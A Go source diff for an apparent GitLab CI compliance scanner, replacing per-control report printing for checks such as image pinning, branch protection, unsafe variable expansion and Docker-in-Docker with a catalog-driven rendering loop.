- controlName := "Container images must not use forbidden tags"
- if result.ImageForbiddenTagsResult.MustBePinnedByDigest {
- controlName = "Container images must not use forbidden tags (pinned by digest)"
- }
-
- ftIssueCodes := make([]control.ErrorCode, 0, len(result.ImageForbiddenTagsResult.Issues))
- for _, issue := range result.ImageForbiddenTagsResult.Issues {
- ftIssueCodes = append(ftIssueCodes, issue.Code)
- }
- ctrl := controlSummary{
- name: controlName,
- compliance: result.ImageForbiddenTagsResult.Compliance,
- issues: len(result.ImageForbiddenTagsResult.Issues),
- skipped: result.ImageForbiddenTagsResult.Skipped,
- codes: uniqueSortedIssueCodeStrings(ftIssueCodes),
- bySeverity: control.SeverityCountsFromIssueCodes(ftIssueCodes),
- }
- controls = append(controls, ctrl)
-
- printControlHeader(controlName, result.ImageForbiddenTagsResult.Compliance, result.ImageForbiddenTagsResult.Skipped)
-
- if result.ImageForbiddenTagsResult.Skipped {
- fmt.Printf(" %sStatus: SKIPPED (disabled in configuration)%s\n", colorDim, colorReset)
- } else if result.ImageForbiddenTagsResult.MustBePinnedByDigest {
- // Digest pinning mode (may also emit forbidden-tag issues when tags are configured)
- fmt.Printf(" Total Images: %d\n", result.ImageForbiddenTagsResult.Metrics.Total)
- fmt.Printf(" Pinned By Digest: %d\n", result.ImageForbiddenTagsResult.Metrics.PinnedByDigest)
- fmt.Printf(" Not Pinned By Digest: %d\n", result.ImageForbiddenTagsResult.Metrics.NotPinnedByDigest)
- fmt.Printf(" Using Forbidden Tags: %d\n", result.ImageForbiddenTagsResult.Metrics.UsingForbiddenTags)
-
- if len(result.ImageForbiddenTagsResult.Issues) > 0 {
- fmt.Printf("\n %sIssues Found:%s\n", colorYellow, colorReset)
- for _, issue := range result.ImageForbiddenTagsResult.Issues {
- switch issue.Code {
- case control.CodeImageNotPinnedByDigest:
- fmt.Printf(" %s [%s] Job '%s' uses image without digest pinning: %s\n", severityTag(issue.Code), issue.Code, issue.Job, issue.Link)
- case control.CodeImageForbiddenTag:
- fmt.Printf(" %s [%s] Job '%s' uses forbidden image tag \"%s\" (image: %s)\n", severityTag(issue.Code), issue.Code, issue.Job, issue.Tag, issue.Link)
- default:
- fmt.Printf(" %s [%s] Job '%s' image: %s\n", severityTag(issue.Code), issue.Code, issue.Job, issue.Link)
- }
- fmt.Printf(" %sβ³ docs: %s%s\n", colorDim, issue.DocURL, colorReset)
- }
- }
- } else {
- // Standard forbidden tags mode
- fmt.Printf(" Total Images: %d\n", result.ImageForbiddenTagsResult.Metrics.Total)
- fmt.Printf(" Using Forbidden Tags: %d\n", result.ImageForbiddenTagsResult.Metrics.UsingForbiddenTags)
-
- if len(result.ImageForbiddenTagsResult.Issues) > 0 {
- fmt.Printf("\n %sForbidden Tags Found:%s\n", colorYellow, colorReset)
- for _, issue := range result.ImageForbiddenTagsResult.Issues {
- fmt.Printf(" %s [%s] Job '%s' uses forbidden tag '%s' (image: %s)\n", severityTag(issue.Code), issue.Code, issue.Job, issue.Tag, issue.Link)
- fmt.Printf(" %sβ³ docs: %s%s\n", colorDim, issue.DocURL, colorReset)
- }
- }
- }
- fmt.Println()
- }
-
- // Control 2: Container images must come from authorized sources
- if result.ImageAuthorizedSourcesResult != nil {
- authCodes := make([]control.ErrorCode, 0, len(result.ImageAuthorizedSourcesResult.Issues))
- for _, issue := range result.ImageAuthorizedSourcesResult.Issues {
- authCodes = append(authCodes, issue.Code)
- }
- ctrl := controlSummary{
- name: "Container images must come from authorized sources",
- compliance: result.ImageAuthorizedSourcesResult.Compliance,
- issues: len(result.ImageAuthorizedSourcesResult.Issues),
- skipped: result.ImageAuthorizedSourcesResult.Skipped,
- codes: uniqueSortedIssueCodeStrings(authCodes),
- bySeverity: control.SeverityCountsFromIssueCodes(authCodes),
- }
- controls = append(controls, ctrl)
-
- printControlHeader("Container images must come from authorized sources", result.ImageAuthorizedSourcesResult.Compliance, result.ImageAuthorizedSourcesResult.Skipped)
-
- if result.ImageAuthorizedSourcesResult.Skipped {
- fmt.Printf(" %sStatus: SKIPPED (disabled in configuration)%s\n", colorDim, colorReset)
- } else {
- fmt.Printf(" Total Images: %d\n", result.ImageAuthorizedSourcesResult.Metrics.Total)
- fmt.Printf(" Authorized: %d\n", result.ImageAuthorizedSourcesResult.Metrics.Authorized)
- fmt.Printf(" Unauthorized: %d\n", result.ImageAuthorizedSourcesResult.Metrics.Unauthorized)
-
- if len(result.ImageAuthorizedSourcesResult.Issues) > 0 {
- fmt.Printf("\n %sUnauthorized Images Found:%s\n", colorYellow, colorReset)
- for _, issue := range result.ImageAuthorizedSourcesResult.Issues {
- fmt.Printf(" %s [%s] Job '%s' uses unauthorized image: %s\n", severityTag(issue.Code), issue.Code, issue.Job, issue.Link)
- fmt.Printf(" %sβ³ docs: %s%s\n", colorDim, issue.DocURL, colorReset)
- }
- }
- }
- fmt.Println()
- }
-
- // Control 3: Branch must be protected
- if result.BranchProtectionResult != nil {
- bpCodes := make([]control.ErrorCode, 0, len(result.BranchProtectionResult.Issues))
- for _, issue := range result.BranchProtectionResult.Issues {
- bpCodes = append(bpCodes, issue.Code)
- }
- ctrl := controlSummary{
- name: "Branch must be protected",
- compliance: result.BranchProtectionResult.Compliance,
- issues: len(result.BranchProtectionResult.Issues),
- skipped: result.BranchProtectionResult.Skipped,
- codes: uniqueSortedIssueCodeStrings(bpCodes),
- bySeverity: control.SeverityCountsFromIssueCodes(bpCodes),
- }
- controls = append(controls, ctrl)
-
- printControlHeader("Branch must be protected", result.BranchProtectionResult.Compliance, result.BranchProtectionResult.Skipped)
-
- if result.BranchProtectionResult.Skipped {
- fmt.Printf(" %sStatus: SKIPPED (disabled in configuration)%s\n", colorDim, colorReset)
- } else {
- if result.BranchProtectionResult.Metrics != nil {
- fmt.Printf(" Total Branches: %d\n", result.BranchProtectionResult.Metrics.Branches)
- fmt.Printf(" Branches to Protect: %d\n", result.BranchProtectionResult.Metrics.BranchesToProtect)
- fmt.Printf(" Protected Branches: %d\n", result.BranchProtectionResult.Metrics.TotalProtectedBranches)
- fmt.Printf(" Unprotected: %d\n", result.BranchProtectionResult.Metrics.UnprotectedBranches)
- fmt.Printf(" Non-Compliant: %d\n", result.BranchProtectionResult.Metrics.NonCompliantBranches)
- }
-
- if len(result.BranchProtectionResult.Issues) > 0 {
- fmt.Printf("\n %sIssues Found:%s\n", colorYellow, colorReset)
- for _, issue := range result.BranchProtectionResult.Issues {
- if issue.Type == "unprotected" {
- fmt.Printf(" %s [%s] Branch '%s' is not protected\n", severityTag(issue.Code), issue.Code, issue.BranchName)
- fmt.Printf(" %sβ³ docs: %s%s\n", colorDim, issue.DocURL, colorReset)
- } else {
- fmt.Printf(" %s [%s] Branch '%s' has non-compliant protection settings\n", severityTag(issue.Code), issue.Code, issue.BranchName)
- if issue.AllowForcePushDisplay {
- fmt.Printf(" ββ Force push is allowed (should be disabled)\n")
- }
- if issue.CodeOwnerApprovalRequiredDisplay {
- fmt.Printf(" ββ Code owner approval is not required\n")
- }
- if issue.MinMergeAccessLevelDisplay {
- fmt.Printf(" ββ Merge access level is too low (%d, minimum: %d)\n", issue.MinMergeAccessLevel, issue.AuthorizedMinMergeAccessLevel)
- }
- if issue.MinPushAccessLevelDisplay {
- fmt.Printf(" ββ Push access level is too low (%d, minimum: %d)\n", issue.MinPushAccessLevel, issue.AuthorizedMinPushAccessLevel)
- }
- fmt.Printf(" %sβ³ docs: %s%s\n", colorDim, issue.DocURL, colorReset)
- }
- }
- }
- }
- fmt.Println()
- }
-
- // Control 4: Pipeline must not include hardcoded jobs
- if result.HardcodedJobsResult != nil {
- hjCodes := make([]control.ErrorCode, 0, len(result.HardcodedJobsResult.Issues))
- for _, issue := range result.HardcodedJobsResult.Issues {
- hjCodes = append(hjCodes, issue.Code)
- }
- ctrl := controlSummary{
- name: "Pipeline must not include hardcoded jobs",
- compliance: result.HardcodedJobsResult.Compliance,
- issues: len(result.HardcodedJobsResult.Issues),
- skipped: result.HardcodedJobsResult.Skipped,
- codes: uniqueSortedIssueCodeStrings(hjCodes),
- bySeverity: control.SeverityCountsFromIssueCodes(hjCodes),
- }
- controls = append(controls, ctrl)
-
- printControlHeader("Pipeline must not include hardcoded jobs", result.HardcodedJobsResult.Compliance, result.HardcodedJobsResult.Skipped)
-
- if result.HardcodedJobsResult.Skipped {
- fmt.Printf(" %sStatus: SKIPPED (disabled in configuration)%s\n", colorDim, colorReset)
- } else {
- fmt.Printf(" Total Jobs: %d\n", result.HardcodedJobsResult.Metrics.Total)
- fmt.Printf(" Hardcoded Jobs: %d\n", result.HardcodedJobsResult.Metrics.HardcodedJobs)
-
- if len(result.HardcodedJobsResult.Issues) > 0 {
- fmt.Printf("\n %sHardcoded Jobs Found:%s\n", colorYellow, colorReset)
- for _, issue := range result.HardcodedJobsResult.Issues {
- fmt.Printf(" %s [%s] Job '%s' is hardcoded (not from include/component)\n", severityTag(issue.Code), issue.Code, issue.JobName)
- fmt.Printf(" %sβ³ docs: %s%s\n", colorDim, issue.DocURL, colorReset)
- }
- }
- }
- fmt.Println()
- }
-
- // Control 5: Includes must be up to date
- if result.OutdatedIncludesResult != nil {
- oiCodes := make([]control.ErrorCode, 0, len(result.OutdatedIncludesResult.Issues))
- for _, issue := range result.OutdatedIncludesResult.Issues {
- oiCodes = append(oiCodes, issue.Code)
- }
- ctrl := controlSummary{
- name: "Includes must be up to date",
- compliance: result.OutdatedIncludesResult.Compliance,
- issues: len(result.OutdatedIncludesResult.Issues),
- skipped: result.OutdatedIncludesResult.Skipped,
- codes: uniqueSortedIssueCodeStrings(oiCodes),
- bySeverity: control.SeverityCountsFromIssueCodes(oiCodes),
- }
- controls = append(controls, ctrl)
-
- printControlHeader("Includes must be up to date", result.OutdatedIncludesResult.Compliance, result.OutdatedIncludesResult.Skipped)
-
- if result.OutdatedIncludesResult.Skipped {
- fmt.Printf(" %sStatus: SKIPPED (disabled in configuration)%s\n", colorDim, colorReset)
- } else {
- fmt.Printf(" Total Includes: %d\n", result.OutdatedIncludesResult.Metrics.Total)
- fmt.Printf(" Outdated: %d\n", result.OutdatedIncludesResult.Metrics.OriginOutdated)
-
- if len(result.OutdatedIncludesResult.Issues) > 0 {
- fmt.Printf("\n %sOutdated Includes Found:%s\n", colorYellow, colorReset)
- for _, issue := range result.OutdatedIncludesResult.Issues {
- fmt.Printf(" %s [%s] %s uses version '%s' (latest: %s)\n", severityTag(issue.Code), issue.Code, issue.GitlabIncludeLocation, issue.Version, issue.LatestVersion)
- fmt.Printf(" %sβ³ docs: %s%s\n", colorDim, issue.DocURL, colorReset)
- }
- }
- }
- fmt.Println()
- }
-
- // Control 6: Includes must not use forbidden versions
- if result.ForbiddenVersionsIncludesResult != nil {
- fvCodes := make([]control.ErrorCode, 0, len(result.ForbiddenVersionsIncludesResult.Issues))
- for _, issue := range result.ForbiddenVersionsIncludesResult.Issues {
- fvCodes = append(fvCodes, issue.Code)
- }
- ctrl := controlSummary{
- name: "Includes must not use forbidden versions",
- compliance: result.ForbiddenVersionsIncludesResult.Compliance,
- issues: len(result.ForbiddenVersionsIncludesResult.Issues),
- skipped: result.ForbiddenVersionsIncludesResult.Skipped,
- codes: uniqueSortedIssueCodeStrings(fvCodes),
- bySeverity: control.SeverityCountsFromIssueCodes(fvCodes),
- }
- controls = append(controls, ctrl)
-
- printControlHeader("Includes must not use forbidden versions", result.ForbiddenVersionsIncludesResult.Compliance, result.ForbiddenVersionsIncludesResult.Skipped)
-
- if result.ForbiddenVersionsIncludesResult.Skipped {
- fmt.Printf(" %sStatus: SKIPPED (disabled in configuration)%s\n", colorDim, colorReset)
- } else {
- fmt.Printf(" Total Includes: %d\n", result.ForbiddenVersionsIncludesResult.Metrics.Total)
- fmt.Printf(" Using Authorized Versions: %d\n", result.ForbiddenVersionsIncludesResult.Metrics.UsingAuthorizedVersion)
- fmt.Printf(" Using Forbidden Versions: %d\n", result.ForbiddenVersionsIncludesResult.Metrics.UsingForbiddenVersion)
-
- if len(result.ForbiddenVersionsIncludesResult.Issues) > 0 {
- fmt.Printf("\n %sForbidden Versions Found:%s\n", colorYellow, colorReset)
- for _, issue := range result.ForbiddenVersionsIncludesResult.Issues {
- fmt.Printf(" %s [%s] %s uses forbidden version '%s'\n", severityTag(issue.Code), issue.Code, issue.GitlabIncludeLocation, issue.Version)
- fmt.Printf(" %sβ³ docs: %s%s\n", colorDim, issue.DocURL, colorReset)
- }
- }
- }
- fmt.Println()
- }
-
- // Control 7: Pipeline must include component
- if result.RequiredComponentsResult != nil {
- totalComponentIssues := len(result.RequiredComponentsResult.Issues) + len(result.RequiredComponentsResult.OverriddenIssues)
- rcCodes := make([]control.ErrorCode, 0, totalComponentIssues)
- for _, issue := range result.RequiredComponentsResult.Issues {
- rcCodes = append(rcCodes, issue.Code)
- }
- for _, issue := range result.RequiredComponentsResult.OverriddenIssues {
- rcCodes = append(rcCodes, issue.Code)
- }
- ctrl := controlSummary{
- name: "Pipeline must include component",
- compliance: result.RequiredComponentsResult.Compliance,
- issues: totalComponentIssues,
- skipped: result.RequiredComponentsResult.Skipped,
- codes: uniqueSortedIssueCodeStrings(rcCodes),
- bySeverity: control.SeverityCountsFromIssueCodes(rcCodes),
- }
- controls = append(controls, ctrl)
-
- printControlHeader("Pipeline must include component", result.RequiredComponentsResult.Compliance, result.RequiredComponentsResult.Skipped)
-
- if result.RequiredComponentsResult.Skipped {
- fmt.Printf(" %sStatus: SKIPPED (disabled in configuration)%s\n", colorDim, colorReset)
- } else {
- fmt.Printf(" Requirement Groups: %d\n", result.RequiredComponentsResult.Metrics.TotalGroups)
- fmt.Printf(" Satisfied Groups: %d\n", result.RequiredComponentsResult.Metrics.SatisfiedGroups)
-
- if len(result.RequiredComponentsResult.Issues) > 0 {
- fmt.Printf("\n %sMissing Components:%s\n", colorYellow, colorReset)
- for _, issue := range result.RequiredComponentsResult.Issues {
- fmt.Printf(" %s [%s] %s (group %d)\n", severityTag(issue.Code), issue.Code, issue.ComponentPath, issue.GroupIndex+1)
- fmt.Printf(" %sβ³ docs: %s%s\n", colorDim, issue.DocURL, colorReset)
- }
- }
-
- if len(result.RequiredComponentsResult.OverriddenIssues) > 0 {
- fmt.Printf("\n %sOverridden Components:%s\n", colorYellow, colorReset)
- for _, issue := range result.RequiredComponentsResult.OverriddenIssues {
- fmt.Printf(" %s [%s] %s (group %d)\n", severityTag(issue.Code), issue.Code, issue.ComponentPath, issue.GroupIndex+1)
- for _, job := range issue.OverriddenJobs {
- fmt.Printf(" job %s%s%s overrides: %s\n", colorDim, job.JobName, colorReset, strings.Join(job.OverriddenKeys, ", "))
- }
- fmt.Printf(" %sβ³ docs: %s%s\n", colorDim, issue.DocURL, colorReset)
- }
- }
- }
- fmt.Println()
- }
-
- // Control 8: Pipeline must include template
- if result.RequiredTemplatesResult != nil {
- totalTemplateIssues := len(result.RequiredTemplatesResult.Issues) + len(result.RequiredTemplatesResult.OverriddenIssues)
- rtCodes := make([]control.ErrorCode, 0, totalTemplateIssues)
- for _, issue := range result.RequiredTemplatesResult.Issues {
- rtCodes = append(rtCodes, issue.Code)
- }
- for _, issue := range result.RequiredTemplatesResult.OverriddenIssues {
- rtCodes = append(rtCodes, issue.Code)
- }
- ctrl := controlSummary{
- name: "Pipeline must include template",
- compliance: result.RequiredTemplatesResult.Compliance,
- issues: totalTemplateIssues,
- skipped: result.RequiredTemplatesResult.Skipped,
- codes: uniqueSortedIssueCodeStrings(rtCodes),
- bySeverity: control.SeverityCountsFromIssueCodes(rtCodes),
- }
- controls = append(controls, ctrl)
-
- printControlHeader("Pipeline must include template", result.RequiredTemplatesResult.Compliance, result.RequiredTemplatesResult.Skipped)
-
- if result.RequiredTemplatesResult.Skipped {
- fmt.Printf(" %sStatus: SKIPPED (disabled in configuration)%s\n", colorDim, colorReset)
- } else {
- fmt.Printf(" Requirement Groups: %d\n", result.RequiredTemplatesResult.Metrics.TotalGroups)
- fmt.Printf(" Satisfied Groups: %d\n", result.RequiredTemplatesResult.Metrics.SatisfiedGroups)
-
- if len(result.RequiredTemplatesResult.Issues) > 0 {
- fmt.Printf("\n %sMissing Templates:%s\n", colorYellow, colorReset)
- for _, issue := range result.RequiredTemplatesResult.Issues {
- fmt.Printf(" %s [%s] %s (group %d)\n", severityTag(issue.Code), issue.Code, issue.TemplatePath, issue.GroupIndex+1)
- fmt.Printf(" %sβ³ docs: %s%s\n", colorDim, issue.DocURL, colorReset)
- }
- }
-
- if len(result.RequiredTemplatesResult.OverriddenIssues) > 0 {
- fmt.Printf("\n %sOverridden Templates:%s\n", colorYellow, colorReset)
- for _, issue := range result.RequiredTemplatesResult.OverriddenIssues {
- fmt.Printf(" %s [%s] %s (group %d)\n", severityTag(issue.Code), issue.Code, issue.TemplatePath, issue.GroupIndex+1)
- for _, job := range issue.OverriddenJobs {
- fmt.Printf(" job %s%s%s overrides: %s\n", colorDim, job.JobName, colorReset, strings.Join(job.OverriddenKeys, ", "))
- }
- fmt.Printf(" %sβ³ docs: %s%s\n", colorDim, issue.DocURL, colorReset)
- }
- }
- }
- fmt.Println()
- }
-
- // Control 9: Pipeline must not enable debug trace
- if result.DebugTraceResult != nil {
- dtCodes := make([]control.ErrorCode, 0, len(result.DebugTraceResult.Issues))
- for _, issue := range result.DebugTraceResult.Issues {
- dtCodes = append(dtCodes, issue.Code)
- }
- ctrl := controlSummary{
- name: "Pipeline must not enable debug trace",
- compliance: result.DebugTraceResult.Compliance,
- issues: len(result.DebugTraceResult.Issues),
- skipped: result.DebugTraceResult.Skipped,
- codes: uniqueSortedIssueCodeStrings(dtCodes),
- bySeverity: control.SeverityCountsFromIssueCodes(dtCodes),
- }
- controls = append(controls, ctrl)
-
- printControlHeader("Pipeline must not enable debug trace", result.DebugTraceResult.Compliance, result.DebugTraceResult.Skipped)
-
- if result.DebugTraceResult.Skipped {
- fmt.Printf(" %sStatus: SKIPPED (disabled in configuration)%s\n", colorDim, colorReset)
- } else {
- fmt.Printf(" Variables Checked: %d\n", result.DebugTraceResult.Metrics.TotalVariablesChecked)
- fmt.Printf(" Forbidden Found: %d\n", result.DebugTraceResult.Metrics.ForbiddenFound)
-
- if len(result.DebugTraceResult.Issues) > 0 {
- fmt.Printf("\n %sForbidden Debug Variables Found:%s\n", colorYellow, colorReset)
- for _, issue := range result.DebugTraceResult.Issues {
- location := issue.Location
- if location == "global" {
- fmt.Printf(" %s [%s] %s = \"%s\" (global variables)\n", severityTag(issue.Code), issue.Code, issue.VariableName, issue.Value)
- } else {
- fmt.Printf(" %s [%s] %s = \"%s\" (job '%s')\n", severityTag(issue.Code), issue.Code, issue.VariableName, issue.Value, location)
- }
- fmt.Printf(" %sβ³ docs: %s%s\n", colorDim, issue.DocURL, colorReset)
- }
- }
- }
- fmt.Println()
- }
-
- // Control 10: Pipeline must not use unsafe variable expansion
- if result.VariableInjectionResult != nil {
- viCodes := make([]control.ErrorCode, 0, len(result.VariableInjectionResult.Issues))
- for _, issue := range result.VariableInjectionResult.Issues {
- viCodes = append(viCodes, issue.Code)
- }
- ctrl := controlSummary{
- name: "Pipeline must not use unsafe variable expansion",
- compliance: result.VariableInjectionResult.Compliance,
- issues: len(result.VariableInjectionResult.Issues),
- skipped: result.VariableInjectionResult.Skipped,
- codes: uniqueSortedIssueCodeStrings(viCodes),
- bySeverity: control.SeverityCountsFromIssueCodes(viCodes),
- }
- controls = append(controls, ctrl)
-
- printControlHeader("Pipeline must not use unsafe variable expansion", result.VariableInjectionResult.Compliance, result.VariableInjectionResult.Skipped)
-
- if result.VariableInjectionResult.Skipped {
- fmt.Printf(" %sStatus: SKIPPED (disabled in configuration)%s\n", colorDim, colorReset)
- } else {
- fmt.Printf(" Jobs Checked: %d\n", result.VariableInjectionResult.Metrics.JobsChecked)
- fmt.Printf(" Script Lines Checked: %d\n", result.VariableInjectionResult.Metrics.TotalScriptLinesChecked)
- fmt.Printf(" Unsafe Expansions: %d\n", result.VariableInjectionResult.Metrics.UnsafeExpansionsFound)
-
- if len(result.VariableInjectionResult.Issues) > 0 {
- fmt.Printf("\n %sUnsafe Variable Expansions Found:%s\n", colorYellow, colorReset)
- for _, issue := range result.VariableInjectionResult.Issues {
- if issue.JobName == "(global)" {
- fmt.Printf(" %s [%s] $%s in global %s: %s\n", severityTag(issue.Code), issue.Code, issue.VariableName, issue.ScriptBlock, issue.ScriptLine)
- } else {
- fmt.Printf(" %s [%s] $%s in job '%s' %s: %s\n", severityTag(issue.Code), issue.Code, issue.VariableName, issue.JobName, issue.ScriptBlock, issue.ScriptLine)
- }
- fmt.Printf(" %sβ³ docs: %s%s\n", colorDim, issue.DocURL, colorReset)
- }
- }
- }
- fmt.Println()
- }
-
- // Control 11: Security jobs must not be weakened
- if result.SecurityJobsWeakenedResult != nil {
- sjCodes := make([]control.ErrorCode, 0, len(result.SecurityJobsWeakenedResult.Issues))
- for _, issue := range result.SecurityJobsWeakenedResult.Issues {
- sjCodes = append(sjCodes, issue.Code)
- }
- ctrl := controlSummary{
- name: "Security jobs must not be weakened",
- compliance: result.SecurityJobsWeakenedResult.Compliance,
- issues: len(result.SecurityJobsWeakenedResult.Issues),
- skipped: result.SecurityJobsWeakenedResult.Skipped,
- codes: uniqueSortedIssueCodeStrings(sjCodes),
- bySeverity: control.SeverityCountsFromIssueCodes(sjCodes),
- }
- controls = append(controls, ctrl)
-
- printControlHeader("Security jobs must not be weakened", result.SecurityJobsWeakenedResult.Compliance, result.SecurityJobsWeakenedResult.Skipped)
-
- if result.SecurityJobsWeakenedResult.Skipped {
- fmt.Printf(" %sStatus: SKIPPED (disabled in configuration)%s\n", colorDim, colorReset)
- } else {
- fmt.Printf(" Security Jobs Found: %d\n", result.SecurityJobsWeakenedResult.Metrics.SecurityJobsFound)
- fmt.Printf(" Weakened Jobs: %d\n", result.SecurityJobsWeakenedResult.Metrics.WeakenedJobs)
-
- if len(result.SecurityJobsWeakenedResult.Issues) > 0 {
- fmt.Printf("\n %sWeakened Security Jobs Found:%s\n", colorYellow, colorReset)
- for _, issue := range result.SecurityJobsWeakenedResult.Issues {
- fmt.Printf(" %s [%s] Job '%s': %s\n", severityTag(issue.Code), issue.Code, issue.JobName, issue.Detail)
- fmt.Printf(" %sβ³ docs: %s%s\n", colorDim, issue.DocURL, colorReset)
- }
- }
- }
- fmt.Println()
- }
-
- // Control 12: Pipeline must not execute unverified scripts
- if result.UnverifiedScriptsResult != nil {
- usCodes := make([]control.ErrorCode, 0, len(result.UnverifiedScriptsResult.Issues))
- for _, issue := range result.UnverifiedScriptsResult.Issues {
- usCodes = append(usCodes, issue.Code)
- }
- ctrl := controlSummary{
- name: "Pipeline must not execute unverified scripts",
- compliance: result.UnverifiedScriptsResult.Compliance,
- issues: len(result.UnverifiedScriptsResult.Issues),
- skipped: result.UnverifiedScriptsResult.Skipped,
- codes: uniqueSortedIssueCodeStrings(usCodes),
- bySeverity: control.SeverityCountsFromIssueCodes(usCodes),
- }
- controls = append(controls, ctrl)
-
- printControlHeader("Pipeline must not execute unverified scripts", result.UnverifiedScriptsResult.Compliance, result.UnverifiedScriptsResult.Skipped)
-
- if result.UnverifiedScriptsResult.Skipped {
- fmt.Printf(" %sStatus: SKIPPED (disabled in configuration)%s\n", colorDim, colorReset)
- } else {
- fmt.Printf(" Jobs Checked: %d\n", result.UnverifiedScriptsResult.Metrics.JobsChecked)
- fmt.Printf(" Script Lines Checked: %d\n", result.UnverifiedScriptsResult.Metrics.TotalScriptLinesChecked)
- fmt.Printf(" Unverified Scripts: %d\n", result.UnverifiedScriptsResult.Metrics.UnverifiedScriptsFound)
-
- if len(result.UnverifiedScriptsResult.Issues) > 0 {
- fmt.Printf("\n %sUnverified Script Executions Found:%s\n", colorYellow, colorReset)
- for _, issue := range result.UnverifiedScriptsResult.Issues {
- if issue.JobName == "(global)" {
- fmt.Printf(" %s [%s] Global %s: %s\n", severityTag(issue.Code), issue.Code, issue.ScriptBlock, issue.ScriptLine)
- } else {
- fmt.Printf(" %s [%s] Job '%s' %s: %s\n", severityTag(issue.Code), issue.Code, issue.JobName, issue.ScriptBlock, issue.ScriptLine)
- }
- fmt.Printf(" %sβ³ docs: %s%s\n", colorDim, issue.DocURL, colorReset)
- }
- }
- }
- fmt.Println()
- }
-
- // Control 13: Pipeline must not override job variables
- if result.JobVariablesOverrideResult != nil {
- jvCodes := make([]control.ErrorCode, 0, len(result.JobVariablesOverrideResult.Issues))
- for _, issue := range result.JobVariablesOverrideResult.Issues {
- jvCodes = append(jvCodes, issue.Code)
- }
- ctrl := controlSummary{
- name: "Pipeline must not override job variables",
- compliance: result.JobVariablesOverrideResult.Compliance,
- issues: len(result.JobVariablesOverrideResult.Issues),
- skipped: result.JobVariablesOverrideResult.Skipped,
- codes: uniqueSortedIssueCodeStrings(jvCodes),
- bySeverity: control.SeverityCountsFromIssueCodes(jvCodes),
- }
- controls = append(controls, ctrl)
-
- printControlHeader("Pipeline must not override job variables", result.JobVariablesOverrideResult.Compliance, result.JobVariablesOverrideResult.Skipped)
-
- if result.JobVariablesOverrideResult.Skipped {
- fmt.Printf(" %sStatus: SKIPPED (disabled in configuration)%s\n", colorDim, colorReset)
- } else {
- fmt.Printf(" Variables Checked: %d\n", result.JobVariablesOverrideResult.Metrics.TotalVariablesChecked)
- fmt.Printf(" Overridden Found: %d\n", result.JobVariablesOverrideResult.Metrics.OverriddenFound)
-
- if len(result.JobVariablesOverrideResult.Issues) > 0 {
- fmt.Printf("\n %sOverridden Variables Found:%s\n", colorYellow, colorReset)
- for _, issue := range result.JobVariablesOverrideResult.Issues {
- location := issue.Location
- if location == "global" {
- fmt.Printf(" %s [%s] %s = \"%s\" (global variables)\n", severityTag(issue.Code), issue.Code, issue.VariableName, issue.Value)
- } else {
- fmt.Printf(" %s [%s] %s = \"%s\" (job '%s')\n", severityTag(issue.Code), issue.Code, issue.VariableName, issue.Value, location)
- }
- fmt.Printf(" %sβ³ docs: %s%s\n", colorDim, issue.DocURL, colorReset)
- }
- }
- }
- fmt.Println()
- }
-
- // Control 14: Pipeline must not use Docker-in-Docker
- if result.DockerInDockerResult != nil {
- ddCodes := make([]control.ErrorCode, 0, len(result.DockerInDockerResult.Issues))
- for _, issue := range result.DockerInDockerResult.Issues {
- ddCodes = append(ddCodes, issue.Code)
- }
- ctrl := controlSummary{
- name: "Pipeline must not use Docker-in-Docker",
- compliance: result.DockerInDockerResult.Compliance,
- issues: len(result.DockerInDockerResult.Issues),
- skipped: result.DockerInDockerResult.Skipped,
- codes: uniqueSortedIssueCodeStrings(ddCodes),
- bySeverity: control.SeverityCountsFromIssueCodes(ddCodes),
- }
- controls = append(controls, ctrl)
-
- printControlHeader("Pipeline must not use Docker-in-Docker", result.DockerInDockerResult.Compliance, result.DockerInDockerResult.Skipped)
-
- if result.DockerInDockerResult.Skipped {
- fmt.Printf(" %sStatus: SKIPPED (disabled in configuration)%s\n", colorDim, colorReset)
- } else {
- fmt.Printf(" Jobs Checked: %d\n", result.DockerInDockerResult.Metrics.TotalJobsChecked)
- fmt.Printf(" DinD Services Found: %d\n", result.DockerInDockerResult.Metrics.DindServicesFound)
- fmt.Printf(" Insecure Daemon Config: %d\n", result.DockerInDockerResult.Metrics.InsecureDaemonFound)
-
- if len(result.DockerInDockerResult.Issues) > 0 {
- fmt.Printf("\n %sDocker-in-Docker Issues Found:%s\n", colorYellow, colorReset)
- for _, issue := range result.DockerInDockerResult.Issues {
- if issue.Code == control.CodeDockerInDockerUsage {
- fmt.Printf(" %s [%s] Job '%s' uses DinD service: %s\n", severityTag(issue.Code), issue.Code, issue.JobName, issue.ServiceImage)
- fmt.Printf(" %sConsider using Kaniko or Buildah instead%s\n", colorDim, colorReset)
- } else {
- fmt.Printf(" %s [%s] Job '%s': %s\n", severityTag(issue.Code), issue.Code, issue.JobName, issue.Detail)
- }
- fmt.Printf(" %sβ³ docs: %s%s\n", colorDim, issue.DocURL, colorReset)
- }
- }
- }
- fmt.Println()
- }
+ fmt.Printf(" %s\n\n", styleAccent.Render("CI Config Source: local file"))
+ }
+
+ // Build control summaries and detailed-finding groups from the
+ // config-driven catalog (one entry per configured .plumber.yaml
+ // section) joined with the Rego Findings list. Compliance is
+ // binary: 100 when no finding matches the control, 0 otherwise.
+ // The unified renderer in render_details.go handles the printing
+ // (shared with the GitHub analyze path).
+ findingsByControl := control.FindingsByControl(result.Findings)
+ entries := control.GitLabControls(pc)
+ groups := make([]findingGroup, 0, len(entries))
+ for _, e := range entries {
+ findings := findingsByControl[e.ControlName]
+ if e.ControlName == "branchMustBeProtected" {
+ sortBranchProtectionFindingsForDisplay(findings)
+ }
+ codes := make([]control.ErrorCode, 0, len(findings))
+ items := make([]detailedFinding, 0, len(findings))
+ for _, f := range findings {
+ code := control.ErrorCode(f.Code)
+ codes = append(codes, code)
+ items = append(items, detailedFinding{
+ Code: code,
+ Message: f.Message,
+ DocURL: code.DocURL(),
+ Location: formatFindingLocation(f),
+ DetailLines: detailLinesFromFinding(f),
+ })
+ }
+ compliance := 100.0
+ if !e.Skipped && len(items) > 0 {
+ compliance = 0.0
+ }
+ controls = append(controls, controlSummary{
+ name: e.DisplayName,
+ compliance: compliance,
+ issues: len(items),
+ skipped: e.Skipped,
+ codes: uniqueSortedIssueCodeStrings(codes),
+ bySeverity: control.SeverityCountsFromIssueCodes(codes),
+ })
+ groups = append(groups, findingGroup{
+ Title: e.DisplayName,
+ Compliance: compliance,
+ Skipped: e.Skipped,
+ Stats: buildGitLabControlStats(e.ControlName, result, pc, findings),
+ Findings: items,
+ })
+ }
+ renderFindingGroups(groups)
// Summary Section
printSectionHeader("Summary")
@@ -1707,57 +1260,76 @@ func printSectionHeader(name string) {
//
